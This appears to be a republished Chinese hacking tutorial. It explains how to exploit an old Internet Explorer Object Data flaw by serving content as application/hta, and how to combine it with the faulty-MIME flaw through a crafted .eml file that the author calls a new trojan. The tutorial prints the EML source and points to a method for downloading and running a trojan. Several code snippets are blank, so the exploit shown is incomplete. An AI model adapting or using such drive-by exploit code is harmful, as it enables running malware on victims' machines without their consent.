萬盛學電腦網

 萬盛學電腦網 >> 應用技巧 >> 由錯誤MIME漏洞的利用想到的

由錯誤MIME漏洞的利用想到的





由錯誤MIME漏洞的利用想到的

由錯誤MIME漏洞的利用想到的......
---IE Object Data 數據遠程執行漏洞的利用
作者:冰狐浪子
郵箱:[email protected]
主頁:www.godog.y365.com
測試代碼:http://y365.com/godog/eml/



聲明:因為本文所講方法破壞性極大,可以和錯誤MIME漏洞及com.ms.activeX.ActiveXComponent漏洞相媲美,因此請不要利用本文所講內容用於破壞!否則後果自負!


網友braveboy3來信問我一些問題,信中提到Internet Explorer Object數據遠程執行漏洞,我急忙驅貓上網查看,從綠盟科技上找到了漏洞資料,同時請braveboy3給了一個測試該漏洞的網頁。


下面我結合自己的測試簡單介紹一下這個漏洞:


由於IE處理對象標記OBJECT的DATA標簽時沒有正確處理要被裝載的文件參數,當"OBJECT"標記中用於設置對象的MIME類型的"Type"屬性不為空時,IE會根據標記中的"Type"值裝載文件,此時若控件不安全則IE會提示是否執行,測試代碼如下:

但當"Type"屬性為空時,IE會根據服務器返回的HTTP頭中的Content-Type來處理數據,此時卻沒有充分檢查被裝載的文件屬性,也就是說如果服務器返回的HTTP頭中的Content-Type是application/hta等,那麼腳本就會繞過安全區域限制而能夠執行。(見網友braveboy3提供的測試網頁:http://202.113.125.60/pic/test/test.html)


看到上面的介紹相信大家一定會想到通過更改服務器的MIME映射為:擴展名.hta對應application/hta來利用此漏洞,;而熟悉ASP編程的朋友可能會想到通過用“<%response.ContentType="application/hta"%>”這條語句來設置MIME類型而利用該漏洞(也可用其他的動態網頁語言如:PHP等)。事實上網上此漏洞的利用方法也多為上面兩種方法。可是大多數網友並沒有自己的服務器,而且現在的免費空間卻鮮有支持ASP或其他動態網頁語言的,所以此漏洞利用起來有點困難(老鳥例外,有肉雞呀!呵呵....)


怎麼辦?難道我們只有眼睜睜的看著漏洞從眼皮底下走過?NO!那不是“黑客”行為!


大家對錯誤MIME漏洞耳熟能詳了吧?它的利用借助了eml格式的文件。大家一定還記得“Content-Type: audio/x-wav;”這句代碼吧?它就是用於設置MIME類型的!是不是想到了點什麼?對把它改成“Content-Type: application/hta;”;可怎樣設置OBJECT的DATA標簽的URL地址呢?看MIME漏洞利用中的這句“”,其中src不就是一個URL地址嗎?好啦,都解決拉,下面就讓我們開始打造一個新的木馬文件吧!
下面就是我改好的eml文件源代碼:


MIME-Version: 1.0 /*MIME-多用途的網際郵件擴充協議的版本*/
Content-Type: multipart/related; /*內容類型*/
type="multipart/alternative";
boundary="1" /*分界線*/


--1
Content-Type: multipart/alternative;
boundary="2"


--2
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable




<BR>IE Object Data 數據遠程執行漏洞測試<BR>



如果自動打開記事本程序,則說明測試成功!




--2--


--1
Content-Type: application/hta;
Content-Transfer-Encoding: 7bit
Content-ID:





說明:可以自己加入其他代碼或控件




--1--


測試代碼說明:把上面的代碼保存為test.eml,另外再建一個test.htm文件,內容如下:



打開test.htm文件就可以看到結果!
/*和*/之間的內容是注釋可去掉,可以參照《黑客防線》第九期“無堅不摧的殺手锏--利用Windows幫助文件漏洞運行木馬”一文,在不使用com.ms.activeX.ActiveXComponent漏洞(此漏洞早已出現,可能多數已打補丁)情況下,下載執行木馬程序。

copyright © 萬盛學電腦網 all rights reserved